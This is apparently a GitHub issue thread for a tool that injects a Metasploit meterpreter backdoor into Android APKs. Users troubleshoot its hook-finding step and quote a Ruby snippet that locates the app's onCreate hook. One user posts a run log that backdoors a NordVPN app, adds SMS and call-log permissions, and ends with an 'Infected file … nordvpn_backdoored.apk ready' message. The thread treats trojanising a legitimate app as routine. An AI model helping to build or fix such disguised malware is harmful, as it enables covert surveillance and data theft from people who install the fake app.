### ISSUE TITLE
Probleme to find hook

### ISSUE THREAD

**Issue by Powdo** [xc0d3rz/metasploit-apk-embed-payload#17]
[_] Unable to find correct hook automatically
[_] Please choose from one of the following:
[*] 

no point proposed.

I've simply change the type of message to "info" where not a "error"  in embed-payload.rb ln 219

> 219  messagePrint("Unable to find correct hook automatically","info")

**Comment by 0vulns** [comment]
Great!, Please make a pull request :smile:

**Comment by DizKiller** [comment]
I'm sorry, i dont see this.. here is what i have:


print "[*] Locating onCreate() hook..\n"


launcheractivity = findlauncheractivity(amanifest)
smalifile = 'original/smali/' + launcheractivity.gsub(/\./, "/") + '.smali'
begin
	activitysmali = File.read(smalifile)
rescue Errno::ENOENT
	print "[!] Unable to find correct hook automatically\n"
	begin
		results=scrapeFilesForLauncherActivity()
		smalifile=results[0]
		activitysmali=results[1]
	rescue
		puts "[-] Error finding launcher activity. Exiting"
		exit(1)
	end
end
From new pull, 

But i don't know where to put the        "   "info"    " at... 

I have this: "print "[!] Unable to find correct hook automatically\n""

?? thoughts?

**Comment by DizKiller** [comment]
I am running into this:  I choose Hook point 1: original/smali/com/nordvpn/android/WelcomeActivity.smali

[*] Adding android.permission.READ_SMS
[*] Adding android.permission.WRITE_EXTERNAL_STORAGE
[*] Adding android.permission.SET_WALLPAPER
[*] Adding android.permission.READ_CALL_LOG
[*] Adding android.permission.WRITE_CALL_LOG
[*] Rebuilding /home/monopwn/Desktop/nord/nordvpn.apk with meterpreter injection as /home/monopwn/Desktop/nord/nordvpn_backdoored.apk..
W: res/drawable-v21/$avd_hide_password__0.xml: Invalid file name: must contain only [a-zA-Z0-9_.]. Ignoring...
W: res/drawable-v21/$avd_hide_password__1.xml: Invalid file name: must contain only [a-zA-Z0-9_.]. Ignoring...
W: res/drawable-v21/$avd_hide_password__2.xml: Invalid file name: must contain only [a-zA-Z0-9_.]. Ignoring...
W: res/drawable-v21/$avd_show_password__0.xml: Invalid file name: must contain only [a-zA-Z0-9_.]. Ignoring...
W: res/drawable-v21/$avd_show_password__1.xml: Invalid file name: must contain only [a-zA-Z0-9_.]. Ignoring...
W: res/drawable-v21/$avd_show_password__2.xml: Invalid file name: must contain only [a-zA-Z0-9_.]. Ignoring...
W: A/        (17402): First type is not attr!
Exception in thread "main" brut.androlib.AndrolibException: brut.androlib.AndrolibException: brut.common.BrutException: could not exec (exit code = 134): [/tmp/brut_util_Jar_2222453923199436015.tmp, p, --forced-package-id, 127, --min-sdk-version, 19, --target-sdk-version, 26, --version-code, 188, --version-name, 2.5.5+playstore, --no-version-vectors, -F, /tmp/APKTOOL1374793896837036920.tmp, -0, arsc, -0, 7zip, -0, arsc, -I, /root/.local/share/apktool/framework/1.apk, -S, /home/monopwn/Other/apk_embed/original/res, -M, /home/monopwn/Other/apk_embed/original/AndroidManifest.xml]
	at brut.androlib.Androlib.buildResourcesFull(Androlib.java:477)
	at brut.androlib.Androlib.buildResources(Androlib.java:411)
	at brut.androlib.Androlib.build(Androlib.java:310)
	at brut.androlib.Androlib.build(Androlib.java:263)
	at brut.apktool.Main.cmdBuild(Main.java:227)
	at brut.apktool.Main.main(Main.java:84)
Caused by: brut.androlib.AndrolibException: brut.common.BrutException: could not exec (exit code = 134): [/tmp/brut_util_Jar_2222453923199436015.tmp, p, --forced-package-id, 127, --min-sdk-version, 19, --target-sdk-version, 26, --version-code, 188, --version-name, 2.5.5+playstore, --no-version-vectors, -F, /tmp/APKTOOL1374793896837036920.tmp, -0, arsc, -0, 7zip, -0, arsc, -I, /root/.local/share/apktool/framework/1.apk, -S, /home/monopwn/Other/apk_embed/original/res, -M, /home/monopwn/Other/apk_embed/original/AndroidManifest.xml]
	at brut.androlib.res.AndrolibResources.aaptPackage(AndrolibResources.java:440)
	at brut.androlib.Androlib.buildResourcesFull(Androlib.java:463)
	... 5 more
Caused by: brut.common.BrutException: could not exec (exit code = 134): [/tmp/brut_util_Jar_2222453923199436015.tmp, p, --forced-package-id, 127, --min-sdk-version, 19, --target-sdk-version, 26, --version-code, 188, --version-name, 2.5.5+playstore, --no-version-vectors, -F, /tmp/APKTOOL1374793896837036920.tmp, -0, arsc, -0, 7zip, -0, arsc, -I, /root/.local/share/apktool/framework/1.apk, -S, /home/monopwn/Other/apk_embed/original/res, -M, /home/monopwn/Other/apk_embed/original/AndroidManifest.xml]
	at brut.util.OS.exec(OS.java:95)
	at brut.androlib.res.AndrolibResources.aaptPackage(AndrolibResources.java:434)
	... 6 more
[*] Signing /home/monopwn/Desktop/nord/nordvpn_backdoored.apk ..
[+] Infected file /home/monopwn/Desktop/nord/nordvpn_backdoored.apk ready.
